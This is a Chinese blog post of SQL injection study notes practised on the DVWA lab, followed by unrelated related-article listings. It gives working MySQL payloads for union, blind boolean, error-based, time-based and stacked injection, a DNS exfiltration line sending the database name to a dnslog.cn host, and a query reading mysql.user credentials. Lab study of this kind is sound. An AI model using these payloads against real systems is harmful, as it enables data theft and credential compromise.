visitor009
visitor009

MySQL 注入笔记

靶场环境:dvwa , 安全等级 low

判断存在SQL注入

提交'报错
id=1id =1 and 1=1 返回的结果一样,id=1id =1 and 1=2 返回的结果不一样

构造正确的SQL语句

-- 数字型 id=1 or 1=1
select * from where id=1 or 1=1
--字符型 ' id=' or 2<>'1
select * from where id='' or 2<>'1'
--搜索型 ' or '21
select id from user where name like '%' or '21%'
--带括号 name') or 1 -- #
select id from user where name=('name') or 1
--截断型 id=1 or 1=1 --
select * from where id= 1 or 1=1 --limit 1
--还有像使用双引号的"

注入方式

union 查询

页面使用了select 查询,且返回数据

  1. 先推出当前select 的字段数量
-- 两个select 查询的字段数量需一致。使用order by 判断数量,order by 数字,指定用第n列排序
-- 例如 order by 10 出错,order by 5出错 order 2 返回正确数据
select id,name from user where id=1 union select null, database()
  1. 漏洞利用
-- 查所有数据库, group_concat 把值联接成一个
select id,name from user where id=1 union select 1,group_concat(SCHEMA_NAME) from information_schema.SCHEMATA 
-- 查表
select id,name from user where id=1 union select 1,table_name from information_schema.TABLES  where TABLE_SCHEMA = database()
-- 查字段
select id,name from user where id=1 union select 1,column_name from information_schema.COLUMNS where TABLE_SCHEMA = database() and TABLE_NAME = 'users'
-- 查值
select id,name from user where id=1 union select 1, password from 'users' where first_name='admin'

示例,打开 dvwa-sql Injection

  1. 推断当前select 字段数量
输入 1' order by 2 #
提交没报错,证明当前select 字段数量是2
  1. union 查询
查数据库
1' union select null, database() #
查表
1' union select 1,table_name from information_schema.TABLES  where TABLE_SCHEMA = database() #
查字段
1' union select 1,column_name from information_schema.COLUMNS where TABLE_SCHEMA = database() and TABLE_NAME = 'users' #
查值
1' union select 1, password from users where first_name='admin' #

布尔注入

有数据返回yes, 无数据返回no。只能根据构造带条件的sql判断。手工判断需要耗费大量时间,跑脚本吧。查询的参数需要正常有数据的才会触发and后面的 。靶场:dvwa > SQL Injection (Blind)

查库

  1. 先判断数据库长度,用二分法试探
    1' and length(database()) >= 4 #
  2. 判断数据库字母组成。根据数据库命名规则,穷举判断,得出数据库名字。
    1' and substr(database(),1,1) = 'd' #

查表

  1. 判断表名长度
    1' and length((select table_name from information_schema.TABLES where TABLE_SCHEMA = database() limit 0,1)) >= 9 #
  2. 查表名
    1 and substr((select table_name from information_schema.TABLES where TABLE_SCHEMA = database() limit 0,1),1,1)='g' #

查列

  1. 查列名长度
    1' and length((select column_name from information_schema.COLUMNS where TABLE_SCHEMA = database() and TABLE_NAME ='users' limit 0,1)) >= 7 #
  2. 查列名字符
    1' and substr((select column_name from information_schema.columns where TABLE_SCHEMA = database() and TABLE_NAME ='users' limit 0,1),1,1) = 'u' #

报错注入

利用报错信息显示查询的数据,需要引发报错。靶场 dvwa>sql Injection

  1. 查数据库
    ' and updatexml(1,concat(0x7e, (select database()),0x7e), 1) #
  2. 查表
    ' and updatexml(1,concat(0x7e, (select table_name from information_schema.TABLES where TABLE_SCHEMA = database() limit 0,1),0x7e), 1) #
  3. 查列
    ' and updatexml(1,concat(0x7e, (select column_name from information_schema.COLUMNS where TABLE_SCHEMA = database() and TABLE_NAME = 'users' limit 0,1),0x7e), 1) #
  4. 查值
    'and updatexml(1,concat(0x7e, (select user_id from users limit 0,1),0x7e), 1)#

时间注入

利用响应时间判断条件成立, 步骤和布尔注入类似

  1. 查库。如果数据库名字大于2,页面会2秒后才响应
    1' and if (length(database())>=2,sleep(2),1) #

堆叠注入

如果可以运行多条语句,那么就可以使用;拼接多条语句
1'; update user set money=102 where id=1 #

## 漏洞利用
-- --
### 枚举数据库信息
```sql
-- MySQL 5.0 +
select SCHEMA_NAME from information_schema.SCHEMATA -- 所有数据库名称
select table_name from information_schema.TABLES  where TABLE_SCHEMA = database() -- 当前数据库所有的表
 -- 当前数据库下的test表的所有列
select column_name from information_schema.COLUMNS where TABLE_SCHEMA = database() and TABLE_NAME = 'user'
-- MySQL 常用函数
database() -- 当前数据库
user()  -- 当前查询用户
version() -- 数据库版本

-- 示例
-- 查当前数据库名字,置顶取第一条
select id,name from user where id = 1 union select 0,database() order by 1 limit 1

DNS 注入

DNSLog Platform 从这里拿一个域名替换 r2bu6n.dnslog.cn

http://127.0.0.1/sqli-labs/Less-1/?id=1 and load_file(concat("\\\\",database(),".r2bu6n.dnslog.cn\\xxx.txt"))

delete 注入

查数据库,步骤和报错注入类似
delete from message where id=56 or updatexml(2,concat(0x7e,(database())),0)

窃取口令

select * from mysql.user

你可能感兴趣的:(MySQL 注入笔记)

  • 《构建之法》 –读书笔记 Lishq2004 读书笔记软件开发软件工程读书笔记构建
    《构建之法》–读书笔记lishq为什么读这本书:这是一本非常接地气的讲《软件工程》的书,第一次了解到这本书是从豆瓣上看到,看了下密密麻麻的正面评论,觉得内容应该不错。翻阅了几个章节,发现干货确实挺多。为方便大家了解,摘抄作者简介以及部分书评如下。---------------------------------------------------------------------------
  • nacos学习笔记 柠檬编程工作室 SpringCloud微服务java面试经验学习笔记
    Nacos(动态服务发现、配置管理与服务管理平台)是阿里巴巴开源的一个分布式系统架构中服务发现和配置管理的基础组件。它的主要目标是提供一个动态服务发现、配置管理和服务管理的解决方案。Nacos主要适用于微服务架构,并在云原生环境下发挥重要作用。Nacos的核心功能服务发现与健康检查Nacos提供了服务发现功能,可以帮助微服务在运行时动态发现其他服务的地址和端口。服务提供者(例如一个微服务实例)将自
  • nodejs + express + mysql + sequelize 项目创建流程 刘锋林 nodejsmysql等后端问题expressjavascriptnode.js
    这个流程后续随着项目进度会有逐渐更新,流程图链接:,《nodejs+express+mysql+sequelize项目创建流程》
  • lua mysql 事务_Lua 数据库访问 weixin_39998906 luamysql事务
    Lua数据库访问本文主要为大家介绍Lua数据库的操作库:LuaSQL。他是开源的,支持的数据库有:ODBC,ADO,Oracle,MySQL,SQLite和PostgreSQL。本文为大家介绍MySQL的数据库连接。LuaSQL可以使用LuaRocks来安装可以根据需要安装你需要的数据库驱动。LuaRocks安装方法:$wgethttp://luarocks.org/releases/luaroc
  • lua可以调用mysql数据库吗_Lua 数据库访问 女王丁丁
    Lua数据库访问作者:杨梦鸽校对:翟舒青本文主要为大家介绍Lua数据库的操作库:LuaSQL。他是开源的,支持的数据库有:ODBC,ADO,Oracle,MySQL,SQLite和PostgreSQL。本文为大家介绍MySQL的数据库连接。LuaSQL可以使用LuaRocks来安装可以根据需要安装你需要的数据库驱动。LuaRocks安装方法:$wgethttp://luarocks.org/rel
  • mysql 删除数据的四种方法 m0_74824780 mysqlandroid数据库
    在MySQL数据库中,删除数据是一个常见的操作,它允许从表中移除不再需要的数据,本文就来介绍一下四种方法,具有一定的参考价值,感兴趣的可以了解一下目录写在前面?方法介绍1.DELETE语句示例:??2.DROPTABLE语句:3.?TRUNCATETABLE示例:4.使用外键约束:示例:??方法优缺点1.DELETE语句:2.TRUNCATETABLE语句:3.DROPTABLE语句:4.使用外键
  • MySQL的集群配置和读写分离配置 lqg_zone 数据库相关mysql数据库
    MySQL重点概念介绍分布式集群方案主从节点复制分库分表mycat读写分离参数配置MySQL主节点MySQL从节点实例讲演分布式部署性能演示独立mysql对比主从复制+读写分离参考资料:浅谈mysql集群浅谈mysql集群_mysql不同集群连接-CSDN博客MySQLReplication主从复制全方位解决方案MySQLReplication主从复制全方位解决方案-惨绿少年-博客园MySQL主从
  • Lua 数据库访问 froginwe11 开发语言
    Lua数据库访问引言Lua是一种轻量级的编程语言,因其简洁性和高效性,常被用于游戏开发、嵌入系统和应用程序开发。在许多情况下,数据库访问是应用程序的核心功能之一。本文将深入探讨在Lua中如何进行数据库访问,包括连接数据库、执行查询、处理结果以及异常处理等。Lua数据库访问概述在Lua中,有多种方法可以用来访问数据库。以下是几种常用的数据库访问方式:直接使用数据库的命令行工具:例如,使用MySQL的
  • 非线性动力学笔记C2.1-2.2 一维流动中的不动点和稳定性 阿北Ben 笔记
    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录前言C2一维流动(flowonaline)引言2.1几何思考方式2.不动点(fixedpoint)与稳定性(stability)Appendix1前言提示:这里可以添加本文要记录的大概内容:参考书《Nonlineardynamicsandchaos》StevenH.Strogatz本节重点Note第二章内容的引言的1-2小节,
  • sqlite数据库 SickeyLee Android项目总结数据库sqliteandroid
    一、什么是sqlite数据库SQLite,是一款轻型的数据库,它的设计目标是嵌入式的,而且已经在很多嵌入式产品中使用了它,它占用资源非常的低,在嵌入式设备中,可能只需要几百K的内存就够了。它能够支持Windows/Linux/Unix等等主流的操作系统,同时能够跟很多程序语言相结合,同样比起Mysql、PostgreSQL这两款开源的世界著名数据库管理系统来讲,它的处理速度比他们都快。1、简单,无
  • Java程序性能优化读书笔记(一):Java性能调优概述 anxunnian1498 java数据库操作系统
    程序性能的主要表现点:执行速度:程序的反映是否迅速,响应时间是否足够短内存分配:内存分配是否合理,是否过多地消耗内存或者存在内存泄漏启动时间:程序从运行到可以正常处理业务需要花费多少时间负载承受能力:当系统压力上升时,系统的执行速度、响应时间的上升曲线是否平缓衡量程序性能的主要指标:执行时间:程序从运行到结束所使用的时间CPU时间:函数或者线程占用CPU的时间内存分配:程序在运行时占用内容的空间磁
  • 大数据知识图谱之深度学习——基于BERT+LSTM+CRF深度学习识别模型医疗知识图谱问答可视化系统_bert+lstm 2301_76348014 程序员深度学习大数据知识图谱
    文章目录大数据知识图谱之深度学习——基于BERT+LSTM+CRF深度学习识别模型医疗知识图谱问答可视化系统一、项目概述二、系统实现基本流程三、项目工具所用的版本号四、所需要软件的安装和使用五、开发技术简介Django技术介绍Neo4j数据库Bootstrap4框架Echarts简介NavicatPremium15简介Layui简介Python语言介绍MySQL数据库深度学习六、核心理论贪心算法A
  • C#中使用 Prism 框架 0仰望星空007 C#基础c#开发语言.netPrismwpf
    C#中使用Prism框架前言一、安装Prism框架二、模块化开发三、依赖注入四、导航五、事件聚合六、状态管理七、测试前言Prism框架是一个用于构建可维护、灵活和可扩展的XAML应用程序的框架。它提供了一套工具和库,帮助开发者实现诸如依赖注入、模块化、导航、事件聚合等功能。使用Prism可以帮助我们构建具有良好结构的应用程序,并且使得代码更易于理解和维护。一、安装Prism框架在VisualStu
  • 【Jvascript 算法】-- JavaScript实现对树结构数据的增删以及树型数据与数组的相互转换 野生松
    在日常开发中我们经常会碰到树结构数据,以下是我的笔记:constarr=[{id:2,name:'部门B',parentId:0},{id:3,name:'部门C',parentId:1},{id:1,name:'部门A',parentId:2},{id:4,name:'部门D',parentId:1},{id:5,name:'部门E',parentId:2},{id:6,name:'部门F',p
  • Prism 框架基础介绍 光之使者-聪 Prism框架c#visualstudiowindows系统架构
    Prism框架基础介绍WPFPrism框架介绍WPFPrism是微软提供的一个开源框架,旨在帮助开发人员构建复杂的、模块化和可维护的WPF应用程序。Prism支持MVVM(Model-View-ViewModel)设计模式,模块化开发,以及依赖注入(DependencyInjection),并为WPF应用提供导航、事件管理和区域管理的功能。Prism最初是作为“CompositeApplicati
  • WPF学习笔记 蒋劲豪 WPFwpf学习笔记C#
    容器控件:GridstackPanelWrapPanelDockPanelUniformGridGrid:Grid.RowDefinitionsRowDefinitionGrid.ColumnDefinitionsColumnDefinition第一行的高度是第二行的2倍100auto占2列的空间stackPanel:一般用来修饰部分容器,一般是垂直居中的水平水平排列WrapPanel:默认是贴着
  • mysql查询 limit 1000,10 和limit 10 一样快么,如何优化? 佳德_Boy mysql数据库java
    目录问题两种limit的执行过程基于主键索引的limit执行过程基于非主键索引的limit执行过程深度分页问题总结(最终解决方案)问题第一页就是下面这样的sql语句。select*frompageorderbyidlimit0,10;第一百页就是select*frompageorderbyidlimit990,10;用这种方式,同样都是拿10条数据,查第一页和第一百页的查询速度是一样的吗?为什么?
  • 3.2025年个人心仪笔记本 growhuan 从选购笔记本开始写起笔记本电脑
    3.2025年个人心仪笔记本本篇文章主要分享一下2025年个人向心仪的几款笔记本,仅供参考。笔记本决赛名单经过在各大平台疯狂搜索了解各种信息后,结合个人审美以及预算整理出几个最后的决赛选手。如下:ThinkBook14:优点:定位轻薄本、14英寸版本、性能外观都不错,支持后续扩展内存硬盘空间,一线品牌,售后容易。缺点:功耗太低,性能释放感觉不够。对比14+并没有便宜多少。价格:酷睿:U5-125H
  • 【mysql】锁机制 - 2.行锁间隙锁临键锁 m0_54804970 面试学习路线阿里巴巴mysql数据库
    目录1.锁的几种类型1.1记录锁(行锁)?RecordLock1.2?间隙锁GapLock1.3临键锁?Next-KeyLock2.加锁过程2.1唯一索引的查询(1)等值查询,查询记录存在(2)?等值查询,查询记录不存在(3)范围查询2.2普通索引的查询(1)等值查询,查询记录存在(2)等值查询,查询记录不存在(3)范围查询2.3其他查询2.4总结1.锁的几种类型对InnoDB按照锁粒度可以分为:
  • [008] [RT-Thread学习笔记] 求结构体首地址rt_list_entry函数与字节对齐RT_ALIGN宏 柯西的彷徨 RT-Threadlist数据结构rtos
    RT-Thread学习笔记rt_list_entry函数源码分析应用示例RT_ALIGN宏源码分析应用示例RT-Thread版本:4.0.5MCU型号:STM32F103RCT6(ARMCortex-M3内核)1rt_list_entry函数rt_list_entry函数的作用是根据已知成员的地址,算出其结构体的首地址。函数定义如下(在rtservice.h中):1.1源码分析#definert_
  • [Ubuntu 20.04]Realtek ALC294无声音解决 CatTomCSDN ubuntulinux
    本文首发于本人博客:[Ubuntu20.04]RealtekALC294无声音解决目录环境问题解决附:查看你使用的声卡型号参考环境ASUSFL8000UUbuntu20.04问题RealtekALC294声卡在Ubuntu20.04下外放/耳机无声音估计这个问题应该只要是ASUS都可能会遇到,不论笔记本还是主板…解决修改/etc/modprobe.d/alsa-base.conf在文件的最后添加o
  • 《Operating System Concepts》阅读笔记:p17-p25 操作系统
    《OperatingSystemConcepts》学习第5天,p17-p25总结,总计9页。一、技术总结1.计算机系统的组成结构(1)CPU—Thehardwarethatexecutesinstructions.(2)Processor—AphysicalchipthatcontainsoneormoreCPUs.(3)Core—ThebasiccomputationunitoftheCPU.(
  • 使用 Canal 实时从 MySql 向其它库同步数据 m0_74823239 面试学习路线阿里巴巴mysql数据库
    目前绝大多数项目还是采用mysql作为数据存储,对于用户访问量较高的网站来说,mysql读写性能有限,我们通常会把mysql中的数据实时同步到Redis、mongodb、elasticsearch等中间件中,应对高并发访问场景,减轻mysql压力,防止数据库宕机。在项目开发中,为了不会原有代码进行侵入,采用canal中间件实现mysql向其它库的实时同步,是一种很不错的方案。canal译意为水道/
  • 用js代码实现贪吃蛇小游戏 guai_guai_guai javascript前端开发语言
    js已经学了大部分了,现在就利用我所学的js知识试试做贪吃蛇小游戏吧以下部分相关图片以及思路笔记均出自渡一陈老师的视频首先制作简单的静态页面,添加贪吃蛇移动的背景和相关图片,比如开始游戏等等将各个功能均封装在函数中,利用主函数调用分函数会使结构更清晰初始化游戏初始化地图地图坐标//1.初始化地图for(leti=0;i=td||newHead.y=tr){collideCheckInfo.isCo
  • i510300h和i78750h参数对比哪个好 妙龙 笔记本
    i510300H是笔记本平台的标准电压处理器,为四核心八线程,主频2.5GHz,睿频4.5GHz,45WTDP,8M三级缓存,passmark跑分为9026分。我的笔记本就是活动时8折抢购的https://list.jd.com/list.html?i7-8750H的规格是6核心12线程,coffcelake架构,主频2.2GHz,单核最大睿频4.1GHz,六核最大睿频3.9GHz,L3缓存9MB
  • 英特尔 Core i9-9880H 处理器:架构、性能与应用 汪子熙 计算机基础知识架构
    英特尔Corei9-9880H是一款高性能移动处理器,广泛应用于高端笔记本电脑和工作站。其设计旨在满足对计算能力有严苛要求的专业用户和发烧友的需求。本文将详细探讨该处理器的各项参数,包括架构设计、性能指标、内存支持、图形能力、先进技术特性以及实际应用案例。1.架构设计Corei9-9880H基于英特尔CoffeeLake-HR架构,采用14纳米工艺制造。它集成了8个物理核心,并支持超线程技术(Hy
  • 【MySQL】mysqldump使用方法 m0_74825152 面试学习路线阿里巴巴mysqloracle数据库
    本文介绍MySQL数据库mysqldump常用方法。MySQL数据库mysqldump常用方法导出整个数据库(包括数据库中的数据)。mysqldump-uusername-pdbname>dbname.sql导出数据库结构(不含数据)。mysqldump-uusername-p-ddbname>dbname.sql导出数据库中的某张数据表(包含数据)。mysqldump-uusername-pdb
  • 【MySQL】在 Centos7 环境安装 MySQL -- 详细完整教程 m0_74823842 面试学习路线阿里巴巴mysqlwebviewandroid
    说明:安装与卸载中,用户全部切换成为root,一旦安装,普通用户就能使用。一、卸载内置环境1、卸载不要的环境[root@VM-8-5-centos~]$psajx|grepmariadb#先检查是否有mariadb存在13134148441484313134pts/014843S+10050:00grep--color=automariadb19010191871901019010?-1Sl271
  • 4.1、十字线 - 趋势中的十字线 五十番 K线技术学习笔记金融
    K线技术学习笔记------基本知识------1.1、基本知识-蜡烛图的历史1.2、基本知识-蜡烛图的结构1.3、基本知识-合成蜡烛线------反转形态------2.1、反转形态-单线反转形态2.2、反转形态-双线反转形态2.3、反转形态-三线反转形态2.4、反转形态-多线反转形态------持续形态------3.1、持续形态-窗口3.2、持续形态-三法形态3.3、持续形态-分手线形态--
  • spring启动流程 (5) Autowired原理 xuguofeng2016 SpringSpringBootjava技术springjavaspringboot
    构造方法参数AutowireBeanClass可以在构造方法上标注@Autowired注解,Spring在创建Bean实例时将自动为其注入依赖参数Spring会优先使用标注@Autowired注解的构造方法当一个构造方法标注了@Autowired注解且required=true时,其余构造方法不允许再标注@Autowired注解当多个构造方法标注了@Autowired注解且required=fal
  • 多线程编程之join()方法 周凡杨 javaJOIN多线程编程线程
    现实生活中,有些工作是需要团队中成员依次完成的,这就涉及到了一个顺序问题。现在有T1、T2、T3三个工人,如何保证T2在T1执行完后执行,T3在T2执行完后执行?问题分析:首先问题中有三个实体,T1、T2、T3, 因为是多线程编程,所以都要设计成线程类。关键是怎么保证线程能依次执行完呢?   Java实现过程如下: public class T1 implements Runnabl
  • java中switch的使用 bingyingao javaenumbreakcontinue
    java中的switch仅支持case条件仅支持int、enum两种类型。 用enum的时候,不能直接写下列形式。 switch (timeType) { case ProdtransTimeTypeEnum.DAILY: break; default: br
  • hive having count 不能去重 daizj hive去重having count计数
    hive在使用having count()是,不支持去重计数   hive (default)> select imei from t_test_phonenum where ds=20150701 group by imei having count(distinct phone_num)>1 limit 10;  FAILED: SemanticExcep
  • WebSphere对JSP的缓存 周凡杨 WAS JSP 缓存
          对于线网上的工程,更新JSP到WebSphere后,有时会出现修改的jsp没有起作用,特别是改变了某jsp的样式后,在页面中没看到效果,这主要就是由于websphere中缓存的缘故,这就要清除WebSphere中jsp缓存。要清除WebSphere中JSP的缓存,就要找到WAS安装后的根目录。        现服务
  • 设计模式总结 朱辉辉33 java设计模式
    1.工厂模式   1.1 工厂方法模式 (由一个工厂类管理构造方法)      1.1.1普通工厂模式(一个工厂类中只有一个方法)      1.1.2多工厂模式(一个工厂类中有多个方法)      1.1.3静态工厂模式(将工厂类中的方法变成静态方法) &n
  • 实例:供应商管理报表需求调研报告 老A不折腾 finereport报表系统报表软件信息化选型
    引言 随着企业集团的生产规模扩张,为支撑全球供应链管理,对于供应商的管理和采购过程的监控已经不局限于简单的交付以及价格的管理,目前采购及供应商管理各个环节的操作分别在不同的系统下进行,而各个数据源都独立存在,无法提供统一的数据支持;因此,为了实现对于数据分析以提供采购决策,建立报表体系成为必须。 业务目标 1、通过报表为采购决策提供数据分析与支撑 2、对供应商进行综合评估以及管理,合理管理和
  • mysql 林鹤霄
    转载源:http://blog.sina.com.cn/s/blog_4f925fc30100rx5l.html mysql -uroot -p ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)   [root@centos var]# service mysql
  • Linux下多线程堆栈查看工具(pstree、ps、pstack) aigo linux
    原文:http://blog.csdn.net/yfkiss/article/details/6729364   1. pstree pstree以树结构显示进程$ pstree -p work | grep adsshd(22669)---bash(22670)---ad_preprocess(4551)-+-{ad_preprocess}(4552)  &n
  • html input与textarea 值改变事件 alxw4616 JavaScript
    // 文本输入框(input) 文本域(textarea)值改变事件 // onpropertychange(IE) oninput(w3c) $('input,textarea').on('propertychange input', function(event) {      console.log($(this).val()) });  
  • String类的基本用法 百合不是茶 String
      字符串的用法;     // 根据字节数组创建字符串 byte[] by = { 'a', 'b', 'c', 'd' }; String newByteString = new String(by);         1,length()  获取字符串的长度     &nbs
  • JDK1.5 Semaphore实例 bijian1013 javathreadjava多线程Semaphore
    Semaphore类        一个计数信号量。从概念上讲,信号量维护了一个许可集合。如有必要,在许可可用前会阻塞每一个 acquire(),然后再获取该许可。每个 release() 添加一个许可,从而可能释放一个正在阻塞的获取者。但是,不使用实际的许可对象,Semaphore 只对可用许可的号码进行计数,并采取相应的行动。 S
  • 使用GZip来压缩传输量 bijian1013 javaGZip
            启动GZip压缩要用到一个开源的Filter:PJL Compressing Filter。这个Filter自1.5.0开始该工程开始构建于JDK5.0,因此在JDK1.4环境下只能使用1.4.6。         PJL Compressi
  • 【Java范型三】Java范型详解之范型类型通配符 bit1129 java
        定义如下一个简单的范型类,   package com.tom.lang.generics; public class Generics<T> { private T value; public Generics(T value) { this.value = value; } }
  • 【Hadoop十二】HDFS常用命令 bit1129 hadoop
    1. 修改日志文件查看器   hdfs oev -i edits_0000000000000000081-0000000000000000089 -o edits.xml cat edits.xml   修改日志文件转储为xml格式的edits.xml文件,其中每条RECORD就是一个操作事务日志   2. fsimage查看HDFS中的块信息等 &nb
  • 怎样区别nginx中rewrite时break和last ronin47
    在使用nginx配置rewrite中经常会遇到有的地方用last并不能工作,换成break就可以,其中的原理是对于根目录的理解有所区别,按我的测试结果大致是这样的。 location /    {         proxy_pass http://test; 
  • java-21.中兴面试题 输入两个整数 n 和 m ,从数列 1 , 2 , 3.......n 中随意取几个数 , 使其和等于 m bylijinnan java
    import java.util.ArrayList; import java.util.List; import java.util.Stack; public class CombinationToSum { /* 第21 题 2010 年中兴面试题 编程求解: 输入两个整数 n 和 m ,从数列 1 , 2 , 3.......n 中随意取几个数 , 使其和等
  • eclipse svn 帐号密码修改问题 开窍的石头 eclipseSVNsvn帐号密码修改
    问题描述:      Eclipse的SVN插件Subclipse做得很好,在svn操作方面提供了很强大丰富的功能。但到目前为止,该插件对svn用户的概念极为淡薄,不但不能方便地切换用户,而且一旦用户的帐号、密码保存之后,就无法再变更了。 解决思路:      删除subclipse记录的帐号、密码信息,重新输入
  • [电子商务]传统商务活动与互联网的结合 comsci 电子商务
          某一个传统名牌产品,过去销售的地点就在某些特定的地区和阶层,现在进入互联网之后,用户的数量群突然扩大了无数倍,但是,这种产品潜在的劣势也被放大了无数倍,这种销售利润与经营风险同步放大的效应,在最近几年将会频繁出现。。。。        如何避免销售量和利润率增加的
  • java 解析 properties-使用 Properties-可以指定配置文件路径 cuityang javaproperties
    #mq xdr.mq.url=tcp://192.168.100.15:61618; import java.io.IOException; import java.util.Properties; public class Test { String conf = "log4j.properties"; private static final
  • Java核心问题集锦 darrenzhu java基础核心难点
    注意,这里的参考文章基本来自Effective Java和jdk源码 1)ConcurrentModificationException 当你用for each遍历一个list时,如果你在循环主体代码中修改list中的元素,将会得到这个Exception,解决的办法是: 1)用listIterator, 它支持在遍历的过程中修改元素, 2)不用listIterator, new一个
  • 1分钟学会Markdown语法 dcj3sjt126com markdown
    markdown 简明语法 基本符号 *,-,+ 3个符号效果都一样,这3个符号被称为 Markdown符号 空白行表示另起一个段落 `是表示inline代码,tab是用来标记 代码段,分别对应html的code,pre标签 换行 单一段落( <p>) 用一个空白行 连续两个空格 会变成一个 <br> 连续3个符号,然后是空行
  • Gson使用二(GsonBuilder) eksliang jsongsonGsonBuilder
    转载请出自出处:http://eksliang.iteye.com/blog/2175473 一.概述     GsonBuilder用来定制java跟json之间的转换格式   二.基本使用 实体测试类: 温馨提示:默认情况下@Expose注解是不起作用的,除非你用GsonBuilder创建Gson的时候调用了GsonBuilder.excludeField
  • 报ClassNotFoundException: Didn't find class "...Activity" on path: DexPathList gundumw100 android
    有一个工程,本来运行是正常的,我想把它移植到另一台PC上,结果报: java.lang.RuntimeException: Unable to instantiate activity ComponentInfo{com.mobovip.bgr/com.mobovip.bgr.MainActivity}: java.lang.ClassNotFoundException: Didn't f
  • JavaWeb之JSP指令 ihuning javaweb
      要点   JSP指令简介  page指令  include指令    JSP指令简介    JSP指令(directive)是为JSP引擎而设计的,它们并不直接产生任何可见输出,而只是告诉引擎如何处理JSP页面中的其余部分。 JSP指令的基本语法格式: <%@ 指令 属性名="
  • mac上编译FFmpeg跑ios 啸笑天 ffmpeg
    1、下载文件:https://github.com/libav/gas-preprocessor, 复制gas-preprocessor.pl到/usr/local/bin/下, 修改文件权限:chmod 777 /usr/local/bin/gas-preprocessor.pl 2、安装yasm-1.2.0 curl http://www.tortall.net/projects/yasm
  • sql mysql oracle中字符串连接 macroli oraclesqlmysqlSQL Server
    有的时候,我们有需要将由不同栏位获得的资料串连在一起。每一种资料库都有提供方法来达到这个目的: MySQL: CONCAT() Oracle: CONCAT(), || SQL Server: + CONCAT() 的语法如下: Mysql 中 CONCAT(字串1, 字串2, 字串3, ...): 将字串1、字串2、字串3,等字串连在一起。 请注意,Oracle的CON
  • Git fatal: unab SSL certificate problem: unable to get local issuer ce rtificate qiaolevip 学习永无止境每天进步一点点git纵观千象
    // 报错如下: $ git pull origin master fatal: unable to access 'https://git.xxx.com/': SSL certificate problem: unable to get local issuer ce rtificate   // 原因: 由于git最新版默认使用ssl安全验证,但是我们是使用的git未设
  • windows命令行设置wifi surfingll windowswifi笔记本wifi
    还没有讨厌无线wifi的无尽广告么,还在耐心等待它慢慢启动么 教你命令行设置 笔记本电脑wifi: 1、开启wifi命令 netsh wlan set hostednetwork mode=allow ssid=surf8 key=bb123456 netsh wlan start hostednetwork pause 其中pause是等待输入,可以去掉 2、
  • Linux(Ubuntu)下安装sysv-rc-conf wmlJava linuxubuntusysv-rc-conf
    安装:sudo apt-get install sysv-rc-conf 使用:sudo sysv-rc-conf 操作界面十分简洁,你可以用鼠标点击,也可以用键盘方向键定位,用空格键选择,用Ctrl+N翻下一页,用Ctrl+P翻上一页,用Q退出。     背景知识 sysv-rc-conf是一个强大的服务管理程序,群众的意见是sysv-rc-conf比chkconf
  • svn切换环境,重发布应用多了javaee标签前缀 zengshaotao javaee
    更换了开发环境,从杭州,改变到了上海。svn的地址肯定要切换的,切换之前需要将原svn自带的.svn文件信息删除,可手动删除,也可通过废弃原来的svn位置提示删除.svn时删除。   然后就是按照最新的svn地址和规范建立相关的目录信息,再将原来的纯代码信息上传到新的环境。然后再重新检出,这样每次修改后就可以看到哪些文件被修改过,这对于增量发布的规范特别有用。   检出
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他